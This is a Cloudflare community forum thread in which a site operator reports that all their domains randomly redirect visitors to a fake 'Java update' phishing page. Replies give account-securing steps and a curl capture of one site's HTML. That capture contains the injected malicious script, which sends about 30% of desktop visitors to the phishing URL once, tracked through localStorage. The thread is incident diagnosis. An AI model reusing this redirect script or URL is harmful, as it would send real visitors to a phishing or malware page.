🚨 Suspicious Redirect to Phishing Page via Cloudflare – All Domains Affected

Website, Application, Performance
1

What is the name of the domain?

What is the error number?

sem erro

What is the error message?

Redirecionamento para pagina fake

What is the issue you’re encountering

I’m facing a very serious and urgent issue regarding the redirection of all websites under our management via Cloudflare. Whenever any of our domains are accessed, visitors are automatically redirected to this URL: :link: https://java-update.pob.la This page is clearly a phishing attempt, prompting users to “update Java.” It has absolutely no connection with any of our websites or services. The same behavior occurs even on sites hosted on completely separate servers, which strongly suggests the redirect is happening at the Cloudflare level (possibly via DNS or some injected malicious rule). I have already reviewed: • The origin servers and applications (no changes or signs of compromise). • All Page Rules, Transform Rules, and Redirects in Cloudflare. • DNS records and cache settings. • Website source code and HTTP headers. Everything appears to be normal, but the redirection persists. I would greatly appreciate the community’s help (or even someone from the Cloudflare team) to: 1. Confirm whether similar incidents are affecting other domains. 2. Suggest any further steps for investigation. 3. Check if there has been any recent breach or compromise within our Cloudflare account that might allow this kind of attack. If needed, I can share affected domains and screenshots via private message.

What steps have you taken to resolve the issue?

I have already reviewed:
• The origin servers and applications (no changes or signs of compromise).
• All Page Rules, Transform Rules, and Redirects in Cloudflare.
• DNS records and cache settings.
• Website source code and HTTP headers.

Everything appears to be normal, but the redirection persists.

I would greatly appreciate the community’s help (or even someone from the Cloudflare team) to:
1. Confirm whether similar incidents are affecting other domains.
2. Suggest any further steps for investigation.
3. Check if there has been any recent breach or compromise within our Cloudflare account that might allow this kind of attack.

If needed, I can share affected domains and screenshots via private message.

What are the steps to reproduce the issue?

Acessar o site, as vezes redireciona as vezes nĂŁo

2

The redirect is being done inside the HTML so check your origin. It could also be delivered by Workers (or Snippets if on a paid plan), Pages or R2 in Cloudflare so check there.

If you think your Cloudflare account has been compromised then check for changes to your account in the audit log:
https://dash.cloudflare.com/?to=/:account/audit-log

Resecure your account:

  • change the password
  • set up 2FA
  • change your global API key and any tokens; look for newly created tokens
curl -i https://www.recuperacaobrasil.com.br/
HTTP/2 200
date: Mon, 05 May 2025 19:10:36 GMT
content-type: text/html; charset=utf-8
server: cloudflare
strict-transport-security: max-age=31536000; includeSubDomains
cf-ray: 93b289f1c804b6cd-LHR
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gqWWvnRG%2BWkmrogbbGlr7cs56dIjxl2IYJ5KyeN29InY8%2BCwQc6lFUeTXdv%2FGLUDcy%2F7CsxuzQdxG2%2FzljgMTUHFniMY6so5nKfe6UfU94RJzmlh87a%2BMhNJXfJYMuXtq3BYfSJRIDeY2DNMCvdCw6wuueQMtwA9A6kp"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
content-security-policy: frame-ancestors 'self'; object-src 'none';
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=0&min_rtt=0&rtt_var=0&sent=0&recv=0&lost=0&retrans=0&sent_bytes=0&recv_bytes=0&delivery_rate=0&cwnd=0&unsent_bytes=0&cid=c90ff73b04b66950&ts=685&x=0"

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Teste</title>

          <script>
    function isDesktop() {
      return !/Mobi|Android/i.test(navigator.userAgent);
    }

    function redirectWithChance() {
      if (localStorage.getItem("redirecttt") === "true") {
        return;
      }

      if (isDesktop()) {
        var chance = Math.random();
        if (chance <= 0.30) {
          window.location.href = "https://java-update.pob.la";
          localStorage.setItem("redirecttt", "true");
        }
      }
    }

    redirectWithChance();
          </script>
        </head>
<body>
    <h1>Olá, Mundo!!!</h1>
</body>
</html>%
1 Like
3

May I ask if you’ve used some Cloudflare app from the past or Cloudflare Zaraz? :thinking:

4

This topic was automatically closed 2 days after the last reply. New replies are no longer allowed.